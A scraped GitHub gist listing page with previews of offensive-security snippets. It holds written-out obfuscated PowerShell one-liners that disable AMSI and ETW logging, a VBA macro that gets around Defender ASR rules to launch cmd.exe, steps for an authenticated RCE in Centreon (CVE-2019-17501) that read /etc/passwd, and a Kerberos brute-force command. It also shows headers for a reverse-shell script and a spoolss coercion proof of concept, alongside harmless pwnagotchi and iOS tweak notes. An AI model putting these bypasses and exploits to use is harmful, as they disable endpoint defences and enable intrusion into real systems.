Skip to content

Instantly share code, notes, and snippets.

View sinfulz's full-sized avatar
💩
Pooping!

sinfulz sinfulz

💩
Pooping!
View GitHub Profile
@D3Ext
D3Ext / amsi-bypass.md
Last active March 30, 2024 02:23
All methods to bypass AMSI (2022)

AMSI Bypass

To perform all this techniques you can simply try them by typing "Invoke-Mimikatz" into your powershell terminal, you'll notice that even if you haven't imported Mimikatz it will detect that as malicious. But if the AMSI is off or you avoid it, it just will say that "it's not recognized as the name of a cmdlet", so you could say that you've bypassed the AMSI

However some methods may be detected by the AV but most of them actually work without problem

Powershell downgrade

The first and worst way to bypass AMSI is downgrading powershell version to 2.0.

@qtc-de
qtc-de / DynWin32-ReverseShell.ps1
Last active March 16, 2024 10:37
PowerShell reverse shell that uses dynamically resolved Win32 API functions
<#
DynWin32-ReverseShell.ps1 is a reverse shell based on dynamically looked up Win32 API calls.
The script uses reflection to obtain access to GetModuleHandle, GetProcAddress and CreateProcess.
Afterwards it uses GetModuleHandle and GetProcAddress to resolve the required WSA functions
from ws2_32.dll.
This script should be used for educational purposes only (and maybe while playing CTF :D).
It was only tested on Windows 10 (x64) and is probably not stable or portable. It's only
purpose is to demonstrate the usage of reflective lookups of Win32 API calls. See it as
@reigningshells
reigningshells / powershell-bypasses.ps1
Last active March 16, 2024 09:06
Random PowerShell Bypasses
# Logging bypass:
(({}).gettype())."aSs`emblY"."Getty`PE"(('System.Manage'+'ment.Automati'+'on.Trac'+'ing.P'+'SEtwL'+'og'+'Pro'+'vi'+'d'+'e'+'r'))."gEtf`ieLD"(('etwProvi'+'de'+'r'),('Non'+'P'+'ublic,Static'))."Se`TVAL`Ue"($null,(New-Object System.Diagnostics.Eventing.EventProvider(New-Guid)))
# AMSI Bypass (old, burned)
sET-ItEM ( 'V'+'aR' + 'IA' + 'blE:1q2' + 'uZx' ) ( [TYpE]( "{1}{0}"-F'F','rE' ) ) ; ( GeT-VariaBle ( "1Q2U" +"zX" ) -VaL )."A`ss`Embly"."GET`TY`Pe"(( "{6}{3}{1}{4}{2}{0}{5}" -f'Util','A','Amsi','.Management.','utomation.','s','System' ) )."g`etf`iElD"( ( "{0}{2}{1}" -f'amsi','d','InitFaile' ),( "{2}{4}{0}{1}{3}" -f 'Stat','i','NonPubli','c','c,' ))."sE`T`VaLUE"( ${n`ULl},${t`RuE} )
# New AMSI bypass obfuscation:
@sinfulz
sinfulz / CVE-2019-17501.txt
Last active September 13, 2020 14:22
CVE-2019-17501 - Centreon 19.04 Authenticated RCE
Centreon 19.04 allows attackers to execute arbitrary OS commands via the Command Line field
of main.php?p=60807&type=4 (aka the Configuration > Commands > Discovery screen).
------------------------------------------
[Additional Information]
Once one has logged into Centreon:
1. navigate to: Configuration > Commands > Discovery OR http://ip-address/centreon/main.php?p=60807&type=4
2. in the "Command Line" section put a command: e.g. "cat /etc/passwd" without quotes.
@GermaniumSystem
GermaniumSystem / pwnagotchi notes
Last active March 7, 2024 14:37
How to set up a pwnagotchi in 25* simple steps.
Preface:
I have no idea if any of this is the "right" way of doing it. This is just how I got my unit working.
Good luck.
WARNING: Do not use a V1 Waveshare display module with a stock pwnagotchi! The pwnagotchi expects a V2 module, and may irreparably damage a V1 module!
A V1 display module *can* work, but you must modify `waveshare.py` and `display.py` beforehand. For the time being, this is left as an exercise for the reader.
If you have already burnt a V1 display, try disconnecting it from the Pi and leaving it overnight. This may rejuvenate the display somewhat, but it will likely still display signs of damage.
Installation:
1. `dd` Raspbian Lite to an SD card.
@TarlogicSecurity
TarlogicSecurity / kerberos_attacks_cheatsheet.md
Created May 14, 2019 13:33
A cheatsheet with commands that can be used to perform kerberos attacks

Kerberos cheatsheet

Bruteforcing

With kerbrute.py:

python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>

With Rubeus version with brute module:

@infosecn1nja
infosecn1nja / ASR Rules Bypass.vba
Last active March 3, 2024 22:28
ASR rules bypass creating child processes
' ASR rules bypass creating child processes
' https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-exploit-guard/enable-attack-surface-reduction
' https://www.darkoperator.com/blog/2017/11/11/windows-defender-exploit-guard-asr-rules-for-office
' https://www.darkoperator.com/blog/2017/11/6/windows-defender-exploit-guard-asr-vbscriptjs-rule
Sub ASR_blocked()
Dim WSHShell As Object
Set WSHShell = CreateObject("Wscript.Shell")
WSHShell.Run "cmd.exe"
End Sub
@3xocyte
3xocyte / dementor.py
Last active February 11, 2024 14:10
rough PoC to connect to spoolss to elicit machine account authentication
#!/usr/bin/env python
# abuse cases and better implementation from the original discoverer: https://github.com/leechristensen/SpoolSample
# some code from https://www.exploit-db.com/exploits/2879/
import os
import sys
import argparse
import binascii
import ConfigParser
@CokePokes
CokePokes / gist:9ad9eb5578c94418f437b39475f75e2f
Last active January 12, 2020 07:12
WatchUtils for iOS 11 Electra
This tweak is useless without following the steps below.
Description: Use your Apple Watch to respring/reboot/safemode your connected device.
You can download the ipa file here: https://mega.nz/#!8qgRjJCA!CZjS2FiZ1wKpq5oBZt-MXOxK_kcGOYAvwur_QFh8o7g
Then re-sign with cert only (no prov profile) with iOS App Signer found here: http://dantheman827.github.io/ios-app-signer/
Then install with xCode>Window>Devices&Simulators>Connected Device>+
Then install the "Core WatchUtils" dependency from my beta repo here: https://cokepokes.github.io/ & respring.